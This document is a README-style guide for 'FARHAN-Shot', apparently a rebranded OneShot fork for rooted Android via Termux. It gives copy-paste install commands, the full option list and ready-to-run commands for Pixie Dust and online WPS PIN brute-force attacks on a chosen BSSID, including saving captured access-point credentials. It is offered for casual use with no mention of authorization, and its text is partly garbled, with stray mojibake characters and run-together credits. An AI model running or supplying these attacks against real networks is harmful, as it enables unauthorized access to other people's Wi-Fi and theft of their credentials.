..using wifi-hack by Termux/Android, FARHAN-π«!!
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FARHAN-Shot2 performs Pixie Dust attack without having to switch to monitor mode.
- Pixie Dust attack;
- integrated 3WiFi offline WPS PIN generator;
- online WPS bruteforce;
- Wi-Fi scanner with highlighting based on iw;
- Python 3.6 and above;
- Wpa supplicant;
- Pixiewps;
- iw.
Please note that root access is required.
apt update && apt upgrade && pkg install tsu && pkg install python && pkg install git && pkg install -y root-repo && pkg install -y git tsu python wpa-supplicant pixiewps iw openssl && git clone --depth 1 https://github.com/gtajisan/FARHAN-Shot FARHAN-Shot && termux-setup-storage && sudo python FARHAN-Shot/FARHAN-Shotx.py -i wlan0 -K
To check for updates and update, run
the following command:
(cd FARHAN-Shot && git pull)
if don't understand click here
Installing requirements
pkg update && pkg upgrade -y
pkg install root-repo -y
pkg install git tsu python wpa-supplicant pixiewps iw openssl -y
run farhan hack py
git clone --depth 1 https://github.com/Gtajisan/FARHAN-Shot.git
Running fast command πͺ?
sudo python FARHAN-Shot/FARHAN-Shot.py -i wlan0 -K
sudo python FARHAN-Shot/FARHAN-Shotx.py -i wlan0 -K
rm -rf FARHAN-Shot
Please note that root access is required.
FARHAN-Shot.py <arguments>
Required arguments:
-i, --interface=<wlan0> : Name of the interface to use
Optional arguments:
-b, --bssid=<mac> : BSSID of the target AP
-p, --pin=<wps pin> : Use the specified pin (arbitrary string or 4/8 digit pin)
-K, --pixie-dust : Run Pixie Dust attack
-B, --bruteforce : Run online bruteforce attack
--push-button-connect : Run WPS push button connection
Advanced arguments:
-d, --delay=<n> : Set the delay between pin attempts [0]
-w, --write : Write AP credentials to the file on success
-F, --pixie-force : Run Pixiewps with --force option (bruteforce full range)
-X, --show-pixie-cmd : Alway print Pixiewps command
--vuln-list=<filename> : Use custom file with vulnerable devices list ['vulnwsc.txt']
--iface-down : Down network interface when the work is finished
-l, --loop : Run in a loop
-r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays
--mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
(for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
-v, --verbose : Verbose output
- First turn off your Wifi.
- Turn on Hotspot.
- Turn on Location.
sudo python FARHAN-Shot/File/3FRN.py -i wlan0 -K
sudo python FARHAN-Shot/File/FRN.PY -i wlan0 -K
sudo python FARHAN-Shot/File/bindcd.py -i wlan0 -K
sudo python FARHAN-Shot/File/oneshot.py -i wlan0 -K
- enjoy ππ
Start Pixie Dust attack on a specified BSSID:
cd FARHAN-Shot && sudo python3 FARHAN-Shot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
Show avaliable networks and start Pixie Dust attack on a specified network:
cd FARHAN-Shot && sudo python3 FARHAN-Shot.py -i wlan0 -K
Launch online WPS bruteforce with the specified first half of the PIN:
cd FARHAN-Shot && sudo python3 FARHAN-Shot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
Start WPS push button connection:s
cd FARHAN-Shot && sudo python3 FARHAN-Shot.py -i wlan0 --pbc
Just run:
sudo rfkill unblock wifi
Try disabling Wi-Fi in the system settings and kill the Network manager. Alternatively, you can try running FARHAN-Shot2 with --iface-down
Try running FARHAN-Shot2 with the --mtk-wifi
flag to initialize Wi-Fi device driver.
real developerrofl0r
for initial implementation;Monohrom
for testing, help in catching bugs, some ideas;Wiire
for developing Pixiewps.Mohammad Al Amin
source and tool dev.FARHAN-MUH-TASIM
create and modified π.